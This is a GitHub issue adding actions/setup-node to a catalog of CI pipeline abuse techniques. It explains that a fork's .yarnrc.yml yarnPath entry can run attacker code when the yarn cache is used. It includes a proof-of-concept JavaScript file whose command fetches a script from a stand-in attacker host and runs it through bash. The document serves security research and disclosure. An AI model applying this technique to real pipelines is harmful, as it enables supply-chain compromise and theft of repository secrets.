[LOTP] Add `actions/setup-node`

[AdnaneKhan]

Description of the LOTP tool

actions/setup-node is used to setup a node environment. It supports a cache flag which calls npm or yarn under the hood in order to cache dependencies.

I haven't fully analyzed this, but have validated the yarn case on a disclosure that is currently in progress.

If an attacker sees a workflow that checks out PR code and has the following:

    - name: Use Node.js 20
      uses: actions/setup-node@v4
      with:
        node-version: '20'
        cache: yarn

Then they can simply set the yarnPath config field in the .yarnrc.yml file from their fork and point it to a simple payload javascript file, like so:

yarnPath: "./poc.js"

const { exec } = require('child_process');

// Execute the bash command
exec('bash -c "curl -sSfL attacker-payload.com/payload.sh | bash"', (error, stdout, stderr) => {
    if (error) {
        console.error(`Error: ${error.message}`);
        return;
    }

    if (stderr) {
        console.error(`stderr: ${stderr}`);
        return;
    }

    // Output the result
    console.log(`stdout: ${stdout}`);
});

Configuration files

.yarnrc.yml

Documentation

https://yarnpkg.com/configuration/yarnrc

Real-world example

Pending :)

[fproulx-boostsecurity]

Thanks my friend, feel free to make a PR out of that, but already GitHub Issues backlog is getting juicy enough for quick ref :)